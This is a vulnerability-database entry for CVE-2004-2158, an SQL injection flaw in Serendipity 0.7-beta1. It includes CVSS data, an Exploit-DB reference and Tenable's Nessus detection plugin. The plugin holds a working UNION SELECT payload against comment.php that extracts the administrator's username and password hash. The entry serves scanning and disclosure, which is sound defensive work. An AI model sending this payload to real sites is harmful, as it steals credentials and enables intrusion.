Vulnerabilities > CVE-2004-2158 - Input Validation vulnerability in S9Y Serendipity 0.7Beta1

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
s9y
nessus
exploit available

Summary

SQL injection vulnerability in Serendipity 0.7-beta1 allows remote attackers to execute arbitrary SQL commands via the entry_id parameter to (1) exit.php or (2) comment.php.

Vulnerable Configurations

Part Description Count
Application
S9Y
1

Exploit-Db

descriptionSerendipity 0.7-beta1 SQL Injection Proof of Concept. CVE-2004-2158. Webapps exploit for php platform
idEDB-ID:561
last seen2016-01-31
modified2004-09-28
published2004-09-28
reporteraCiDBiTS
sourcehttps://www.exploit-db.com/download/561/
titleSerendipity 0.7-beta1 SQL Injection Proof of Concept

Nessus

NASL familyCGI abuses
NASL idSERENDIPITY_SQL.NASL
descriptionThe remote version of Serendipity is vulnerable to SQL injection issues due to a failure of the application to properly sanitize user- supplied input. An attacker may exploit this flaw to issue arbitrary statements in the remote database, and therefore, bypass authorization or even overwrite arbitrary files on the remote system In addition, the comment.php script is vulnerable to a cross-site scripting attack.
last seen2020-06-01
modified2020-06-02
plugin id14842
published2004-09-28
reporterThis script is Copyright (C) 2004-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/14842
titleSerendipity < 0.7.0beta3 Multiple Vulnerabilities
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if(description)
{
 script_id(14842);
 script_version ("1.24");

 script_cve_id("CVE-2004-2157", "CVE-2004-2158");
 script_bugtraq_id(11269);

 script_name(english:"Serendipity < 0.7.0beta3 Multiple Vulnerabilities");

 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains PHP scripts that are prone to SQL
injection and a cross-site scripting attack." );
 script_set_attribute(attribute:"description", value:
"The remote version of Serendipity is vulnerable to SQL injection
issues due to a failure of the application to properly sanitize user-
supplied input.

An attacker may exploit this flaw to issue arbitrary statements in the
remote database, and therefore, bypass authorization or even overwrite
arbitrary files on the remote system

In addition, the comment.php script is vulnerable to a cross-site
scripting attack." );
  # http://lists.grok.org.uk/pipermail/full-disclosure/2004-September/026955.html
 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?face78e6" );
 script_set_attribute(attribute:"see_also", value:"https://docs.s9y.org/" );
 script_set_attribute(attribute:"solution", value:
"Upgrade to Serendipity 0.7.0beta3 or later." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"false");
 script_set_attribute(attribute:"plugin_publication_date", value: "2004/09/28");
 script_set_attribute(attribute:"vuln_publication_date", value: "2004/09/28");
 script_cvs_date("Date: 2018/11/15 20:50:18");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe",value:"cpe:/a:s9y:serendipity");
script_end_attributes();


 script_summary(english:"Checks for SQL injection vulnerability in Serendipity");

 script_category(ACT_ATTACK);

 script_copyright(english:"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.");
 script_family(english:"CGI abuses");

 script_dependencies("serendipity_detect.nasl");
 script_exclude_keys("Settings/disable_cgi_scanning");
 script_require_ports("Services/www", 80);
 script_require_keys("www/serendipity");
 exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80);
if(!can_host_php(port:port))exit(0);


# Test an install.
install = get_kb_item(string("www/", port, "/serendipity"));
if (isnull(install)) exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches)) {
 loc = matches[2];
 w = http_send_recv3(method:"GET", item:string(loc, "/comment.php?serendipity[type]=trackbacks&serendipity[entry_id]=0%20and%200%20union%20select%201,2,3,4,username,password,7,8,9,0,1,2,3%20from%20serendipity_authors%20where%20authorid=1%20--"), port:port);
 if (isnull(w)) exit(1, "The web server did not answer");
 r = w[2];

 if( 
  "Weblog" >< r &&
  egrep(pattern:"<b>Weblog: </b> [a-f0-9]*<br />", string:r) &&
  "0 and 0 union select 1,2,3,4,username,password,7,8,9,0,1,2,3 from serendipity_authors where authorid=1" >< r
 ) {
     security_hole(port);
     set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
   }
}